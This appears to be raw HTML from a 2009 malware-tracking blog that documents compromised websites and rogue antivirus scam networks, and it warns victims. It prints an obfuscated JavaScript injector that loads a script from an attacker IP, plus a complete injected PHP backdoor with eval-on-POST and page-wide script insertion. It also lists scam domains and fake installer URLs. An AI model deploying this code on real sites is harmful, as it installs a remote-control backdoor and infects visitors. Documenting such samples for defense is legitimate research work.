href="http://discussion.dreamhost.com/showthreaded.pl?Cat=&Board=forum_troubleshooting&Number=117798&page=4&view=expanded&sb=6&o=14&vc=1" target="_blank">dreamhost.com discussion</a><br /> <a href="http://www.dynamicdrive.com/forums/showthread.php?p=191051" target="_blank">dynamicdrive.com forum</a><br /> <a href="http://www.windowsbbs.com/malware-virus-removal/82784-js-script-juliet.html" target="_blank">windowsbbs.com forum</a> <br /> <a href="http://www.spywarewarrior.com/viewtopic.php?t=30508" target="_blank">spywarewarrior.com forum</a> <br /> <a href="http://www.who-is-who-in-gpt.com/forum/index.php?showtopic=10478" target="_blank">who-is-who-in-gpt.com</a> <br /> <a href="http://www.tcheval.net/forum/s3071-regle-tcheval-net-victime-hack.html" target="_blank">tcheval.net forum (FR)</a><br /><hr /> Also interesting on this IP is this script:<br /> <br /> If you have this code in your site, you are probably on of these victims. <br />Change all your passwords, including FTP, emails etc. On all your accounts.<br /> <br /> 94.247.2.195/jquery.js <br /> or<br /> 78.110.175.249/jquery.js (not responding) in Russia<br /> <br />descr: LIMIT SUREHOST - AAS188-RIPE - @ukservers.com<br />person: Alexander A Solovyov - @limt.ru<br />LIMT Group Ltd. has zero web presence, apart from SPAM, hacking and other problems.<br />They are clearly a bogus company. Clear evidence of criminal fraud. "Same for LIMIT SUREHOST"<br /><br />route: 78.110.160.0/20 - UK Dedicated Servers Limited - AS42831 - UKSERVERS-MNT<br /> <br /> Javascript code:<br /> <br /> <script language=javascript><br /> document.write(unescape('<br /> %3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl6<br /> 1Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXsz<br /> AnczAnrHY8iprLtzAn%3E<br /> ').<br /> replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));<br /> </script> <br /><br /> Script found on compromised websites all for the benefit of the<br /> infamous <a href="http://en.wikipedia.org/wiki/Russian_Business_Network" target="_blank">Russian Business Network</a> (RBN).<br /><br /> PHP code injected<br /><br /><?php <br />if (!function_exists('tmp_lkojfghx')) { <br />for ($i = 1; $i < 10; $i++) <br />if (is_file($f = '/tmp/m' . $i)) { <br />include_once($f); <br />break; <br />} <br />if (isset($_POST['tmp_lkojfghx3'])) <br />eval($_POST['tmp_lkojfghx3']); <br />if (!defined('TMP_XHGFJOKL')) <br />define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5<br />ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaX<br />RlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFM<br />wcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcm<br />M2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdW<br />VyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzB<br />TMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfE<br />lpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3Jp<br />cHQ+')); <br />function tmp_lkojfghx($s) <br />{ <br />if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b')) <br />$s = gzinflate(substr($s, 10, -8)); <br />if (preg_match_all('#<script(.*?)</script>#is', $s, $a)) <br />foreach ($a[0] as $v) <br />if (count(explode("\n", $v)) > 5) { <br />$e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v)<br />|| preg_match('#[\(\[](\s*\d+,){20,}#', $v); <br />if ((preg_match('#\beval\b#', $v) &&<br /> ($e || strpos($v, 'fromCharCode'))) ||<br />($e && strpos($v, 'document.write'))) <br />$s = str_replace($v, '', $s); <br />} <br />$s1 = preg_replace('#<script language=javascript><br /><!-- \ndocument\.write\(unescape\(".+?\n --></script>#', '', $s); <br />if (stristr($s, '<body')) <br />$s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1); <br />elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>')) <br />$s = $s1 . TMP_XHGFJOKL; <br />return $g ? gzencode($s) : $s; <br />} <br />function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0) <br />{ <br />$s = array(); <br />if ($b && $GLOBALS['tmp_xhgfjokl']) <br />call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d); <br />foreach (@ob_get_status(1) as $v) <br />if (($a = $v['name']) == 'tmp_lkojfghx') <br />return; <br />else <br />$s[] = array($a == 'default output handler' ? false : $a); <br />for ($i = count($s) - 1; $i >= 0; $i--) { <br />$s[$i][1] = ob_get_contents(); <br />ob_end_clean(); <br />} <br />ob_start('tmp_lkojfghx'); <br />for ($i = 0; $i < count($s); $i++) { <br />ob_start($s[$i][0]); <br />echo $s[$i][1]; <br />} <br />} <br />} <br />if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2') <br />$GLOBALS['tmp_xhgfjokl'] = $a; <br />tmp_lkojfghx2(); <br />?> <br /><br />with colors:<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdZVX1tYjtI/AAAAAAAAAVw/d4Dfcg_W9iI/s1600-h/php-code-injected.jpg"><img style="cursor:pointer; cursor:hand;width: 166px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdZVX1tYjtI/AAAAAAAAAVw/d4Dfcg_W9iI/s320/php-code-injected.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320533877827604178" /></a><br /><br /><a href="http://www.google.com/search?hl=en&q=%22tmp_lkojfghx%22" target="_blank">Google search</a><br /> <br /> <br /><br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-6444620241046296227?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-63017202674523978662009-04-03T03:37:00.000-07:002009-04-03T04:00:16.811-07:00Black Hat SEO and Rogue Antivirus p.6<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span> <br /><br />Analyzing the tactic<br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> Yet another WinWebSecurity variant this one through crack/serial websites and ad network <br /><br />Fake ad:<br /><i>BE PROTECTED! - FREE online system scan for viruses, trojans and malware. <br />Check it out - maybe someone have access to your PC right now! Protect yourself.</i><br /><br />Which result in a complete set of redirection<br /><br /><a href="http://wepawet.iseclab.org/view.php?hash=8bd407705e77d4149c2d8eeeb4a90624&t=1238754157&type=js" target="_blank">Redirection 1</a><br /><a href="http://wepawet.iseclab.org/view.php?hash=be40e167ad6c26b527ee75aad00e64fe&t=1238754213&type=js" target="_blank">Redirection 2</a><br /><a href="http://wepawet.iseclab.org/view.php?hash=90186e983d193ade0128afc248ea596b&t=1238754257&type=js" target="_blank">Redirection 3</a> <br /><a href="http://wepawet.iseclab.org/view.php?hash=c6f5e7d7eeb0ffcc39f9084a69220f37&t=1238754295&type=js" target="_blank">Redirection 4</a><br /><br />then<br /><br />initialsecurityscan.com<br /><br />Retreived from google cache <a href="http://209.85.229.132/search?q=cache:6dAQ_gk8K8kJ:filecourse.net/file-search-tube%2B8porno-1-full-version-with-crack-rapidshare-links.html+%22Check+it+out+-+maybe+someone+have+access+to+your+PC%22&cd=10&hl=en&ct=clnk" target="_blank">here</a><br /><br /><a href="http://www.virustotal.com/analisis/435fe8b2c2efcc6c268cf922927722d7" target="_blank">VirusTotal</a><br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=27C85C042834ACA4A88A01B1F2D26C00E41566C1" target="_blank">Prevx</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=18bd3ce55e3d94044d936bf1956b3e506" target="_blank">Anubis</a><br /><br />File install.exe received on 04.03.2009 12:28:53 (CET)<br />Result: 18/39 (46.16%) <br /><br />File info:<br /><br />File size: 108584 bytes<br />MD5: de926b63ab0976244d752170dac7ec00 <br /><br /><u>Hosted by Netelligent Hosting Services Inc</u> on the IP 209.44.126.14<br /><br /></p><p>Screenshot on Friday April 3<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXobeBvXTI/AAAAAAAAAVo/fLFWMKnxRrY/s1600-h/initialsecurityscan.com-ad-SCAM.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 231px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXobeBvXTI/AAAAAAAAAVo/fLFWMKnxRrY/s320/initialsecurityscan.com-ad-SCAM.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320414093422583090" /></a><br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXnWfN_2BI/AAAAAAAAAVg/FCiQ6E5dVNA/s1600-h/initialsecurityscan.com-SCAM.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 202px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXnWfN_2BI/AAAAAAAAAVg/FCiQ6E5dVNA/s320/initialsecurityscan.com-SCAM.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320412908331456530" /></a><br /><br />Using NS1.FUCKMONEYCASH.COM and NS2.FUCKMONEYCASH.COM as DNS Servers<br />No whois info - PrivacyProtect.org<br />Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br />Dates: Created 01-apr-2009<br />Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.<br /> <br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-6301720267452397866?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-74864041527116416402009-04-02T08:59:00.000-07:002009-04-03T09:17:04.362-07:00Black Hat SEO and Rogue Antivirus p.4<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span> <br /><br />Full of rogues<br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><br />This is just a sample of websites found in the previous days which are still running.<br />(with some ThreatExpert or VirusTotal reports)<br />
<br /> Site running on these IPs can also be found on this blog and several other forums.<br /> <br /> <u>Hosted by Netelligent Hosting Services Inc</u> on the IP 209.44.126.14<br /><br />activesecurityshield.com - <a href="http://www.threatexpert.com/report.aspx?md5=6c910d7cfbf58a1e0a5eac333233c218">ThreatExpert Report</a><br />bestsecurityupdate.com - <a href="http://www.threatexpert.com/report.aspx?md5=87446e69f49bc886c68a69aef77f9321" target="_blank">ThreatExpert Report</a><br />getscanonline.com - <a href="http://www.threatexpert.com/report.aspx?md5=6fa85eac516c811961b392c9ae7cb5c4" target="_blank">ThreatExpert Report</a><br />getsecuritywall.com - <a href="http://www.threatexpert.com/report.aspx?md5=e267f911190450d30361d44a9826c06b" target="_blank">ThreatExpert Report</a><br />scanalertspage.com - <a href="http://www.threatexpert.com/report.aspx?md5=1b7b9362d9082185dc2d571d55485405" target="_blank">ThreatExpert Report</a><br />scanbaseonline.com - <a href="http://www.threatexpert.com/report.aspx?md5=3328fefcf49eaec404a153981c1a55d4" target="_blank">ThreatExpert Report</a><br />onlinescandetect.com - <a href="http://www.threatexpert.com/report.aspx?md5=49497dd211eb9285bef8dc2787b8665a" target="_blank">ThreatExpert Report</a><br />runpcscannow.com - <a href="http://www.threatexpert.com/report.aspx?md5=6b33b576e1a1920d7ff8504f00d405f6" target="_blank">ThreatExpert Report</a><br />yourstabilitysystem.com - <a href="http://www.threatexpert.com/report.aspx?md5=b854b838003746b4b36013a2306ef595" target="_blank">ThreatExpert Report</a><br />
websecuritymaster.com - <a href="http://www.threatexpert.com/report.aspx?md5=4d395e9476dffb6e430c676984569f40" target="_blank">ThreatExpert Report</a><br />websecurityvoice.com - <a href="http://www.threatexpert.com/report.aspx?md5=41e497f7a2e417716274e4453a902fa0" target="_blank">ThreatExpert Report</a><br /><br />
<u>Hosted by Layered Technologies, Inc</u> on the IP 72.233.34.6<br /><br />zpmuwbtqqwkw.net<br /><br /><u>Hosted by ZlKon</u> on the IP 94.247.3.3<br /><br />greatvirusscan.com - <a href="http://www.threatexpert.com/report.aspx?md5=69337deb113935e3eff3a159b843d661" target="_blank">ThreatExpert Report</a><br />webprotectionscan.com - <a href="http://www.threatexpert.com/report.aspx?md5=f5ad7190cce9aca773b91d251f2b2477" target="_blank">ThreatExpert Report</a><br /><br /><u>Hosted by ZlKon</u> on the IP 94.247.3.74<br /><br />onlinescandetect.com - <a href="http://www.threatexpert.com/report.aspx?md5=6a6e18e2da6748c1c7d4fbc8914e3695" target="_blank">ThreatExpert Report</a><br /><br /><u>Hosted by Eurohost LLC</u> on the IP 91.212.65.55<br /><br />securityscanguide.com - <a href="http://www.threatexpert.com/report.aspx?md5=69337deb113935e3eff3a159b843d661" target="_blank">ThreatExpert Report</a><br /><br /><u>Hosted by UK2 GROUP LTD</u> using resellermatrix on the IP 66.197.154.198<br />other info:<br />netname: HOSTNOC-2BLK<br />AS21788 - BurstNet Technologies, Inc.<br />route: 66.197.128.0/17<br />canonical name for 66.197.154.198: ip.ipdatacenter.net<br /><br /> megascan6.com<br />nowscan6.com <br /> scanline6.com<br />scan6just.com<br />scan6log.com<br />scan6main.com<br />scan6now.com<br /><br /><u>Hosted by netdirekt e.K.</u> on the IP 89.149.241.134<br /><br />desktopprepairpackage.com<br />pcantimalwaresolution.com<br /><br /><u>Hosted by Ecatel LTD</u> on the IP 91.212.65.55 [AS29073]<br /><br />securityscanguide.com - <a href="http://www.threatexpert.com/report.aspx?md5=69337deb113935e3eff3a159b843d661" target="_blank">ThreatExpert Report</a><br /><br /><u>Hosted by netdirekt e.K</u>. on the IP 89.149.241.134<br />also use 94.102.51.14 by Ecatel Network<br /><br />comdwnld.com<br />desktopprepairpackage.com <br />pcantimalwaresolution.com<br />removespywarethreats.com<br />securecleanersolution.com<br />securecleanertool.com<br /><br /><br /><br />Another interesting link on<i>"evenmorestats.com"</i> leads to a collection of SCAM sites<br /><br /> </p> <table width="565" border="0" cellspacing="0" cellpadding="0"><tr><td width="165">cleanerpcsolution.com</td><td width="119">89.149.241.134</td><td width="281">AS28753 - NETDIRECT Frankfurt, DE</td></tr><tr><td>malwareremovingtool.com</td><td>89.149.241.134</td><td>AS28753 - NETDIRECT Frankfurt, DE</td></tr><tr><td>pcantimalwaresolution.com</td><td>89.149.241.134</td><td> AS28753 - NETDIRECT Frankfurt, DE</td></tr><tr><td>removespywarethreats.com</td><td>89.149.241.134</td><td> AS28753 - NETDIRECT Frankfurt, DE</td></tr><tr><td>securecleanersolution.com</td><td>89.149.241.134</td><td>AS28753 - NETDIRECT Frankfurt, DE</td></tr><tr><td>securecleanertool.com</td><td>89.149.241.134</td><td>AS28753 - NETDIRECT Frankfurt, DE</td></tr><tr><td>comdwnld.com</td><td>94.102.51.14</td><td>AS29073 - Ecatel Network</td></tr><tr><td>evenmorestats.com</td><td>84.243.252.160</td><td>AS16131 - GrafiX Internet B.V.</td></tr><tr><td>go-uniq.com</td><td>72.55.153.155</td><td>AS32613 - iWeb Technologies Inc.</td></tr><tr><td>mydwnld.com</td><td>88.198.8.15 </td><td>AS24940 - Hetzner Online AG RZ-Nuernberg </td></tr><tr><td>promotion-offer.com</td><td>88.198.233.225</td><td>AS24940 - Hetzner Online AG RZ-Nuernberg </td></tr><tr><td>traff-direct.com</td><td>78.129.158.69 </td><td>AS29131 - RapidSwitch Ltd</td></tr> </table> <br /> <table width="565" border="0" cellspacing="0" cellpadding="0"><tr><td width="165">comdwnld.com</td><td width="119">94.102.51.14</td><td width="281">AS29073 - Ecatel Network</td></tr> </table> <br />The first sixst used 89.149.241.134 and 94.102.51.14<br /><br />Some of them are registered using "Nexton Limited" as registrant but a search on google also reveal no<br />entries apart frompornography and malware sites. <br />And several other using "Preston Wasson" wassonpreston@email.com<br /><br />Some common DNS actively used (several other will not be added to this page)<br /><br />with ENOM, INC. as registar: <br />ns1.comondns.com [58.65.233.33] - AS10026 - ANC Asia Netcom Corporation<br />ns2.comondns.com [58.65.233.33] - AS10026 - ANC Asia Netcom Corporation <br />ns3.comondns.com [89.149.227.248] - AS28753 - NETDIRECT AS NETDIRECT Frankfurt, DE<br />ns4.comondns.com [79.135.168.112] - AS44097 - SNETTELECOM-AS Sistemnet Telekomunikasyon <br />ns5.comondns.com [79.135.168.112] - AS44097 - SNETTELECOM-AS Sistemnet Telekomunikasyon<br /><br />with DIRECTI INTERNET SOLUTIONS PVT. LTD. as registrar: <br />ns1.gonsset.com [94.102.51.14]<br />ns1.gonsset.com [89.149.227.248] <br /><br />Previous IPs, netblock, WHOIS info and other domain can be retreived on the <br />msmvps spyware sucks blog <a href="http://msmvps.com/blogs/spywaresucks/archive/2009/03/11/1677438.aspx" target="_blank">here</a> <br /><br />Redirectors are: evenmorestats.com/in.cgi?6 - go-uniq.com/in.cgi?13&gai=cspamg&gli=79 (<a href="http://wepawet.iseclab.org/view.php?hash=36112599c25f12ae29da3d9aac726ad6&t=1238728358&type=js" target="_blank">Analysis</a>)<br /><br /><hr /><br />comdwnld.com has a collection of rogue security software which serve for several other sites:<br /><br />Some detections: <a href="http://www.virustotal.com/analisis/30e27d455e81d8d6d9322674f91c4434" target="_blank">Trojan FakeSpyGuard</a>, <a href="http://www.virustotal.com/analisis/1e87e3d0b1fc4ca9709bc17104d44f61" target="_blank">Adware VirusRemover</a>, <a href="http://www.virustotal.com/analisis/95ed3cacca2007dc7fb354329e6275d5" target="_blank">WinAntiVirus2008</a>, <a href="http://www.virustotal.com/analisis/bab606f85c06bf4c83205831d702e547" target="_blank">Trojan Hiloti</a>, <a href="http://www.virustotal.com/analisis/f86f36f74d72e5f7ca0e39ce12221d93" target="_blank">SpywareRemover2009</a><br /><br />comdwnld.com/AntiMalwareGuard_Paid_Rezer.exe<br />comdwnld.com/SpywareRemover2009_Installer_Dual_Rezer_en.exe <br />comdwnld.com/VirusRemover2008_Setup_Paid_Rezer_en.exe<br />comdwnld.com/AntiMalwareGuard/1.0.36.0/AMGFreeUpdate_Rezer.exe<br />comdwnld.com/AntiMalwareSuite/4.1.233.1/AMSFreeUpdate_Rezer.exe<br />comdwnld.com/AntiMalwareSuite/4.1.233.1/AMSFreeUpdate_Rezer_qrt.exe <br />comdwnld.com/SpywareRemover2009.com/SpywareRemover2009_Installer_Paid_Rezer_en.exe<br />comdwnld.com/SpywareRemover2009.com/SpywareRemover2009_Setup_Dual_Rezer_en.exe<br />comdwnld.com/antimalwaresuite2009.com/AMS_FullInstaller_Rezer.exe <br />comdwnld.com/bestvirusremover2009.com/1.0.3.1/FreeApp%20_Rezer.exe<br />comdwnld.com/bestvirusremover2009.com/1.0.3.1/FreeApp_Rezer.exe<br />comdwnld.com/bestvirusremover2009.com/1.0.3.1/FreeApp_Rezer_qrt.exe<br />comdwnld.com/bestvirusremover2009.com/1.0.6.0/FreeApp%20_Rezer.exe<br />comdwnld.com/bestvirusremover2009.com/1.0.6.0/FreeApp_Rezer.exe<br />comdwnld.com/bestvirusremover2009.com/1.0.6.0/FreeApp_Rezer_qrt.exe<br />comdwnld.com/bestvirusremover2009.com/virusremover2009_setup_paid_rezer_en.exe<br />comdwnld.com/cleaner2009pro.com/1.0.18.0/CLNFreeApp_Rezer.exe<br />comdwnld.com/cleaner2009pro.com/1.0.18.0/CLNFreeApp_Rezer_qrt.exe<br />comdwnld.com/cleaner2009pro.com/CLN_2009FullInstall_Rezer.exe<br />comdwnld.com/nss_downloads/AntiMalwareGF_Rezer.exe<br />comdwnld.com/nss_downloads/VirusRemover2008_Setup_Free_Rezer_en.exe<br />comdwnld.com/nss_downloads/SpywareRemover2009.com/SpywareRemover2009_Installer_Dual_Rezer_en.exe<br />comdwnld.com/nss_downloads/SpywareRemover2009.com/SpywareRemover2009_Installer_Dual_br1_en.exe<br />comdwnld.com/nss_downloads/SpywareRemover2009.com/SpywareRemover2009_Installer_Paid_br1_en.exe<br />comdwnld.com/nss_downloads/antimalwaresuite2009.com/AMS_FreeInstaller_Rezer.exe<br />comdwnld.com/nss_downloads/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe<br />comdwnld.com/nss_downloads/cleaner2009pro.com/CLN_2009FreeInstall_Rezer.exe<br />comdwnld.com/nss_downloads/secureexpertcleaner.com/SecureExpertCleaner_Dual_Rezer_En.exe<br />comdwnld.com/nss_downloads/secureexpertcleaner.com/SecureExpertCleaner_Dual_br1_En.exe<br />comdwnld.com/secureexpertcleaner.com/SecureExpertCleaner_Paid_Rezer_En.exe<br />comdwnld.com/secureexpertcleaner.com/SecureExpertCleaner_Paid_br1_En.exe<br />comdwnld.com/secureexpertcleaner.com/1.0.18.3/SECFreeApp_Rezer.exe<br />comdwnld.com/secureexpertcleaner.com/1.0.18.3/SECFreeApp_Rezer_qrt.exe<br />comdwnld.com/secureexpertcleaner.com/1.0.18.5/SECFreeApp_Rezer.exe<br />comdwnld.com/secureexpertcleaner.com/1.0.18.5/SECFreeApp_Rezer_qrt.exe<br />comdwnld.com/secureexpertcleaner.com/1.0.18.6/SECFreeApp_br1.exe<br />comdwnld.com/secureexpertcleaner.com/1.0.18.6/SECFreeApp_br1_qrt.exe<br />comdwnld.com/virusremover2008.com/1.0.3.1/FreeApp_Rezer.exe<br />comdwnld.com/virusremover2008.com/1.0.3.1/FreeApp_Rezer_qrt.exe<br />comdwnld.com/virusremover2008.com/1.0.6.0/FreeApp_Rezer.exe<br />comdwnld.com/virusremover2008.com/1.0.6.0/FreeApp_Rezer_qrt.exe<br />comdwnld.com/virusremover2009.com/1.0.3.1/FreeApp_Rezer.exe<br />comdwnld.com/virusremover2009.com/1.0.3.1/FreeApp_Rezer_qrt.exe<br />comdwnld.com/virusremover2009.com/1.0.6.0/FreeApp_Rezer.exe<br />comdwnld.com/virusremover2009.com/1.0.6.0/FreeApp_Rezer_qrt.exe<br />comdwnld.com/virusremover2009.com/1.0.8.0/FreeApp_Rezer.exe<br />comdwnld.com/virusremover2009.com/1.0.8.0/FreeApp_Rezer_qrt.exe <br /><br /><hr /><br />So firstly, let's show you the home page of these sites:<br /><br />cleanerpcsolution.com<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdV7Wfpo1YI/AAAAAAAAAUQ/ZWvrFe-_vos/s1600-h/SCAM-cleanerpcsolution.com.jpg"><img style="cursor:pointer; cursor:hand;width: 194px; height: 320px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdV7Wfpo1YI/AAAAAAAAAUQ/ZWvrFe-_vos/s320/SCAM-cleanerpcsolution.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294161191589250" /></a> <br /><br />desktoprepairpackage.com<br />pcsolutionshelp.com <br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdV7WhZinQI/AAAAAAAAAUY/ZmlBB1nRVR8/s1600-h/SCAM-desktoprepairpackage.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 294px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdV7WhZinQI/AAAAAAAAAUY/ZmlBB1nRVR8/s320/SCAM-desktoprepairpackage.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294161660943618" /></a> <br /><br />malwareremovingtool.com<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7W9snrHI/AAAAAAAAAUg/Ef47UWW7Ps8/s1600-h/SCAM-malwareremovingtool.com.jpg"><img style="cursor:pointer; cursor:hand;width: 306px; height: 320px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7W9snrHI/AAAAAAAAAUg/Ef47UWW7Ps8/s320/SCAM-malwareremovingtool.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294169257159794" /></a> <br /><br />pcantimalwaresolution.com <br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdV7XJUYA_I/AAAAAAAAAUo/BKJJoVlXuTw/s1600-h/SCAM-pcantimalwaresolution.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 309px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdV7XJUYA_I/AAAAAAAAAUo/BKJJoVlXuTw/s320/SCAM-pcantimalwaresolution.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294172376695794" /></a> <br /><br />removespywarethreats.com<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7XeNNjZI/AAAAAAAAAUw/sTmBkjNTaLI/s1600-h/SCAM-removespywarethreats.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 281px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7XeNNjZI/AAAAAAAAAUw/sTmBkjNTaLI/s320/SCAM-removespywarethreats.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294177983794578" /></a> <br /><br />securecleanersolution.com<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7b7A3CXI/AAAAAAAAAU4/pyk0w8egFm4/s1600-h/SCAM-securecleanersolution.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 305px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7b7A3CXI/AAAAAAAAAU4/pyk0w8egFm4/s320/SCAM-securecleanersolution.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294254436092274" /></a> <br /><br /><hr /><br />And now the collection of fake scanner with different template.<br /><br />http://removespywarethreats.com/2009/142/?a=&l=&f=&ex=&ed=&sub=pdt&prodabbr=USRM <br /><br />Redirectors:<br /><br />hxxp://evenmorestats.com/in.cgi (redirect to yahoo news)<br />hxxp://evenmorestats.com/in.cgi?2 (redirect to google) <br /><br />hxxp://evenmorestats.com/in.cgi?3 (<a href="http://wepawet.iseclab.org/view.php?hash=63d78e44a67726f8698b4da9286a3baf&t=1238565166&type=js" target="_blank">Analysis</a>)<br />redirect to: <br />hxxp://securecleanersolution.com/2009/1001/?a=&l=&f=&sub=&prodabbr=3P_USEC<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTWl5wIH3I/AAAAAAAAARY/yiFzzOXcvzY/s1600-h/securecleanersolution.com-fake-scanner.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 309px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTWl5wIH3I/AAAAAAAAARY/yiFzzOXcvzY/s320/securecleanersolution.com-fake-scanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113006477582194" /></a> <br /><br />hxxp://evenmorestats.com/in.cgi?4 (<a href="http://wepawet.iseclab.org/view.php?hash=eb5aeb996e30b5ba22508a2395704622&t=1238565168&type=js" target="_blank">Analysis</a>)<br />redirect to: <br />hxxp://spywareprotectiontool.com/2009/141/?a=&l=&f=&ex=&ed=&sub=csp&prodabbr=USRM<br /><br />hxxp://evenmorestats.com/in.cgi?6 (<a href="http://wepawet.iseclab.org/view.php?hash=82d3d269a2d3245a5cf22299dfbdba76&t=1238565172&type=js" target="_blank">Analysis</a>)<br />redirect to: <br />hxxp://securecleanersolution.com/2009/102/?a=&l=&f=&sub=&prodabbr=3P_USEC<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTW1QQGkUI/AAAAAAAAARg/CeyiMVKCisM/s1600-h/securecleanersolution.com-fake-scanner2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 277px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTW1QQGkUI/AAAAAAAAARg/CeyiMVKCisM/s320/securecleanersolution.com-fake-scanner2.jpg" border="0" 